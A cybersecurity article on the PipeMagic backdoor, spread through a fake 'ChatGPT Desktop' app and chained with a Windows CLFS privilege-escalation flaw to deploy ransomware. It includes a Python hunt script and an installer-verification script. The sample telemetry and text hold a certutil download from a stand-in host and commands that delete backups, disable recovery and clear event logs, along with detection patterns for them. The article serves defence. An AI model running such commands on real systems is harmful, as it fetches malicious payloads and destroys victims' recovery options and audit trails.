PipeMagic Malware Masquerades as ChatGPT: Windows Vulnerability Exploited for Ransomware

Fake “ChatGPT Desktop” app drops the PipeMagic backdoor; Storm‑2460 chains a CLFS zero‑day (CVE‑2025‑29824) to deploy ransomware. Detection, hardening, and response guidance follows.


[Header image: a desktop window labeled "ChatGPT" with a warning icon, a code overlay, named‑pipe glyphs, and a CLFS chip motif]

Breaking Brief

  • A counterfeit “ChatGPT Desktop” app is delivering PipeMagic, a modular backdoor used by the financially motivated group Storm‑2460. The campaign chains a Windows CLFS zero‑day (CVE‑2025‑29824) for privilege escalation and ends in ransomware deployment; victims span IT, finance, and real estate across the U.S., Europe, South America, and the Middle East. [microsoft +1]

  • Delivery relies on compromised legitimate sites, certutil‑based downloads, and malicious MSBuild project files that reflectively load PipeMagic in memory; the CLFS exploit then elevates privileges so the operators can delete backups and stage encryption. [logpoint +1]

Technical Deep Dive

  • Loader and disguise: the attackers forked a legitimate open‑source ChatGPT desktop project and added code that decrypts and runs an in‑memory dropper for PipeMagic; the trojanized app shows no meaningful UI (blank‑window decoy variants have been seen since 2024). [securityaffairs +1]

  • Backdoor architecture: PipeMagic talks to its C2 over TCP and pulls additional modules through encrypted named pipes, tracking them in in‑memory doubly linked lists for staging, execution, and communications, which keeps on‑disk artifacts to a minimum. [thehackernews +1]

  • Exploit chain: certutil fetches a malicious MSBuild project from a compromised site; the project decrypts an embedded payload and executes it through an API callback (EnumCalendarInfoA), which starts PipeMagic. The backdoor then triggers the CLFS elevation of privilege (CVE‑2025‑29824) before the ransomware is launched. [logpoint +1]

  • Post‑EoP actions: LSASS memory dumping, backup catalog deletion (wbadmin delete catalog), BCD tampering to disable recovery (bcdedit /set {default} recoveryenabled no), and event log clearing (wevtutil cl), a playbook built for high‑impact encryption at scale. [logpoint]

AI‑Themed Social Engineering Trends

  • Brand abuse: fake AI apps (ChatGPT desktop clients) make high‑trust lures; the projects are cloned from GitHub, trojanized so the installer drops a loader or backdoor, and pushed through malvertising. [securityaffairs +1]

  • ClickFix‑style flows: users are steered by malvertising or compromised sites to “fix” prompts that silently run malicious installers, in line with recent social engineering patterns. [intruceptlabs +1]

Detection Guide

  • Endpoint telemetry

    • Flag certutil network calls that pull MSBuild project files from unusual domains, and correlate them with msbuild.exe launching outside any developer workflow. [microsoft +1]

    • Hunt for creation or use of random named pipes matching the \\.\pipe\1.<hex> pattern, followed by outbound TCP sessions to rare hosts. [thehackernews]

    • Detect BCD edits, wbadmin backup deletions, and wevtutil log clears within the same session; together they form the classic ransomware preparation sequence. [logpoint]

  • Network/SWG

    • Block newly observed domains hosting “ChatGPT desktop” installers, and inspect MSBuild project downloads from compromised legitimate sites. [intruceptlabs +1]

    • Alert on anomalous TCP C2 beacons from endpoints that recently executed ChatGPT‑themed installers. [thehackernews]
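The three endpoint rules above, written out as an added example (prototype hunt code for this article, not Microsoft's, Logpoint's or any vendor's detection content). It runs over constructed Sysmon‑style events embedded in the block (EventID 1 process creation, EventID 17 pipe created); the field names, the logon ID used as the session key, the time windows, and the minimum hex length in the pipe regex are assumptions that a real deployment would tune to its own telemetry.

```python
"""Prototype hunt logic for the PipeMagic / Storm-2460 chain over Sysmon-style
events. Sample telemetry below is constructed for the demo, not real logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# PipeMagic names its pipe "1." followed by a random hex string. Sysmon's
# PipeName field usually omits the \\.\pipe\ prefix, so accept both forms.
# The 8+ hex-digit floor is an assumption to cut noise from short names.
PIPEMAGIC_PIPE = re.compile(r"^(?:\\\\\.\\pipe)?\\1\.[0-9a-fA-F]{8,}$")
# certutil used as a downloader: -urlcache plus an http(s) URL.
URL_FETCH = re.compile(r"(?i)certutil(\.exe)?\s.*-urlcache.*https?://")
# Recovery-killing steps seen before encryption.
PREP_STEPS = {
    "bcd_recovery_off": re.compile(r"(?i)bcdedit.*recoveryenabled\s+no"),
    "wbadmin_delete":   re.compile(r"(?i)wbadmin.*delete\s+catalog"),
    "wevtutil_clear":   re.compile(r"(?i)wevtutil(\.exe)?\s+cl\b"),
}
FETCH_WINDOW = timedelta(minutes=10)   # certutil fetch -> msbuild.exe (assumed)
PREP_WINDOW = timedelta(minutes=30)    # span for the prep sequence (assumed)


def _ts(evt):
    return datetime.fromisoformat(evt["time"])


def hunt(events):
    """Return sorted, de-duplicated (rule, logon_id) alerts for the event list."""
    alerts = set()
    by_session = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_session[e["logon_id"]].append(e)
        if e["event_id"] == 17 and PIPEMAGIC_PIPE.match(e["pipe_name"]):
            alerts.add(("pipemagic_named_pipe", e["logon_id"]))
    for sid, evs in by_session.items():
        procs = [e for e in evs if e["event_id"] == 1]
        # Rule 1: certutil URL fetch followed by msbuild.exe in the same session.
        fetches = [_ts(e) for e in procs if URL_FETCH.search(e["command_line"])]
        for e in procs:
            if e["image"].lower().endswith("msbuild.exe") and any(
                    timedelta(0) <= _ts(e) - t <= FETCH_WINDOW for t in fetches):
                alerts.add(("certutil_then_msbuild", sid))
        # Rule 2: two or more distinct prep steps inside PREP_WINDOW.
        hits = [(name, _ts(e)) for e in procs
                for name, rx in PREP_STEPS.items() if rx.search(e["command_line"])]
        for _, t in hits:
            seen = {n for n, t2 in hits if abs(t2 - t) <= PREP_WINDOW}
            if len(seen) >= 2:
                alerts.add(("ransomware_prep_sequence", sid))
    return sorted(alerts)


# Constructed sample telemetry: one benign developer session, one attack session.
SAMPLE_EVENTS = [
    dict(event_id=1, time="2025-04-08T09:00:00", logon_id="0x1a2b",
         image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
         command_line=r"MSBuild.exe MyApp.sln /t:Build"),
    dict(event_id=17, time="2025-04-08T09:00:02", logon_id="0x1a2b",
         image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         pipe_name=r"\PSHost.133552.1234.DefaultAppDomain.powershell"),
    dict(event_id=1, time="2025-04-08T09:05:00", logon_id="0x1a2b",
         image=r"C:\Windows\System32\certutil.exe",
         command_line=r"certutil -hashfile C:\build\app.exe SHA256"),
    dict(event_id=1, time="2025-04-08T10:00:00", logon_id="0x4a2f",
         image=r"C:\Windows\System32\certutil.exe",
         command_line=r"certutil -urlcache -split -f http://compromised.example/assets/build.xml C:\Users\Public\build.xml"),
    dict(event_id=1, time="2025-04-08T10:00:05", logon_id="0x4a2f",
         image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
         command_line=r"MSBuild.exe C:\Users\Public\build.xml"),
    dict(event_id=17, time="2025-04-08T10:00:07", logon_id="0x4a2f",
         image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
         pipe_name=r"\1.0f3a8c71d2b44e9a5c6d7e8f90a1b2c3"),
    dict(event_id=1, time="2025-04-08T10:12:00", logon_id="0x4a2f",
         image=r"C:\Windows\System32\bcdedit.exe",
         command_line=r"bcdedit /set {default} recoveryenabled no"),
    dict(event_id=1, time="2025-04-08T10:12:03", logon_id="0x4a2f",
         image=r"C:\Windows\System32\wbadmin.exe",
         command_line=r"wbadmin delete catalog -quiet"),
    dict(event_id=1, time="2025-04-08T10:12:05", logon_id="0x4a2f",
         image=r"C:\Windows\System32\wevtutil.exe",
         command_line=r"wevtutil cl Application"),
]

if __name__ == "__main__":
    for rule, sid in hunt(SAMPLE_EVENTS):
        print(f"ALERT {rule} in logon session {sid}")
```

Only the attack session fires, and it fires on all three rules; the developer session, which also runs msbuild.exe and certutil, stays quiet because the certutil call is a local -hashfile and no prep commands appear. Keying on the logon ID rather than the process tree is what makes the prep sequence rule survive the process hops that the CLFS exploit introduces.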

Windows Hardening and Immediate Mitigations

  • Patch CLFS: ensure the April 2025 security update (or any later cumulative update) that fixes CVE‑2025‑29824 is deployed on every Windows endpoint; prioritize admin workstations and servers. [microsoft +1]

  • Constrain LOLBINs: block or restrict certutil.exe and msbuild.exe on non‑developer machines via AppLocker or WDAC; enable the Attack Surface Reduction rules for Office and script abuse, and the rule that blocks process creations originating from PsExec and WMI commands where those are not needed. [logpoint]

  • EDR controls: turn on memory scanning and named‑pipe monitoring, and add detections for EnumCalendarInfoA callback loaders and reflective PE injection patterns. [thehackernews +1]

  • Software allowlisting: permit only signed and verified installers, require code‑signed updates for any “ChatGPT desktop” tool, and prefer the official store or vendor channels. [securityaffairs]

ChatGPT App Verification Guide (for users)

  • Source of truth: download only from the official publisher site or a verified app store; avoid “free enhanced ChatGPT desktop” links from ads or forums. [securityaffairs]

  • Signature check: verify the digital signature and publisher (for example with signtool verify /pa or PowerShell's Get‑AuthenticodeSignature), and hash‑check installers against the publisher's known‑good release hashes. [securityaffairs]

  • Behavior red flags: a blank UI, unexpected admin prompts, or background network activity while idle are reasons to quarantine the machine and report it. [securityaffairs]
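A small script covering the two verification steps above, added here as an example rather than taken from the page's sources or from any ChatGPT client project: a pinned SHA‑256 comparison, and a test of whether the installer carries an Authenticode signature block at all. The installer name, the pinned hash, and the sample PE bytes are constructed for the demonstration. A non‑zero certificate table only proves that a signature is attached; validate it with signtool verify /pa or Get‑AuthenticodeSignature before trusting the file.

```python
"""Installer sanity checks: compare against a pinned SHA-256 and test whether
a PE file has an Authenticode (Certificate Table) entry. Added example; the
pinned hash and sample PE bytes are constructed, not real releases."""
import hashlib
import hmac
import io
import struct

# Constructed allowlist: installer name -> known-good SHA-256 (hex). In practice
# this comes from the publisher's release page, never from the download host.
# The value below is sha256(b"abc"), used only for the demo.
PINNED_SHA256 = {
    "ChatGPT-Setup.exe":
        "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad",
}

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data-directory index of the Certificate Table


def sha256_stream(fobj, chunk=1 << 20):
    """Hash a file object in 1 MiB chunks so large installers never sit in RAM."""
    h = hashlib.sha256()
    for block in iter(lambda: fobj.read(chunk), b""):
        h.update(block)
    return h.hexdigest()


def sha256_bytes(data):
    return sha256_stream(io.BytesIO(data))


def matches_pinned(name, data):
    """True only if the name is on the allowlist and the hash matches.
    Unknown installers are untrusted; the compare is constant-time."""
    expected = PINNED_SHA256.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_bytes(data), expected)


def authenticode_directory(pe):
    """Return (file_offset, size) of the PE Certificate Table, or None if the
    bytes are not a PE image. (0, 0) means no Authenticode blob is attached,
    i.e. the file is unsigned. Presence is not validity."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 4 + 20                      # skip PE signature + COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x20B:                           # PE32+
        n_dirs_off, dirs_off = 108, 112
    elif magic == 0x10B:                         # PE32
        n_dirs_off, dirs_off = 92, 96
    else:
        return None
    n_dirs = struct.unpack_from("<I", pe, opt + n_dirs_off)[0]
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return (0, 0)                            # no security entry at all
    entry = opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if entry + 8 > len(pe):
        return None
    return struct.unpack_from("<II", pe, entry)


def build_sample_pe(signed):
    """Constructed PE32+ header skeleton (not executable) used only to
    exercise authenticode_directory() offline."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)     # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)   # x64, 240-byte opt hdr
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                            # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                             # NumberOfRvaAndSizes
    if signed:
        struct.pack_into("<II", opt, 112 + 8 * 4, 0x400, 0x1234)    # fake WIN_CERTIFICATE offset/size
    return dos + b"PE\0\0" + coff + bytes(opt)


def verify_installer(name, data):
    """Combine both checks into a verdict dict."""
    sec = authenticode_directory(data)
    return {
        "hash_ok": matches_pinned(name, data),
        "is_pe": sec is not None,
        "signature_present": bool(sec and sec[1] > 0),
    }


if __name__ == "__main__":
    print(verify_installer("ChatGPT-Setup.exe", build_sample_pe(signed=False)))
```

The hash check answers "is this the exact build the publisher shipped?", which a valid signature alone does not (a signed but older, vulnerable build still validates). The directory check is the cheap pre-filter: an installer for a "ChatGPT desktop" client with no certificate table at all should never get as far as a signature prompt.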

Incident Response Procedures

  • Contain: isolate affected hosts, block egress to suspected C2, and preserve volatile memory so in‑memory modules and named‑pipe indicators can be recovered. [logpoint +1]

  • Eradicate: remove persistence, rotate credentials, and reimage if LSASS dumping or backup deletion is confirmed; restore from known‑good backups only after validating BCD settings and event log integrity. [logpoint]

  • Recover and monitor: re‑enable recovery options, validate backups, and roll out detections for PipeMagic pipe naming and MSBuild reflective loaders across the fleet. [thehackernews +1]


Alfaiz Ansari is a digital strategist and researcher specializing in Cybersecurity, Artificial Intelligence, and Digital Marketing. As the mind behind Alfaiznova.com, he combines technical expertise …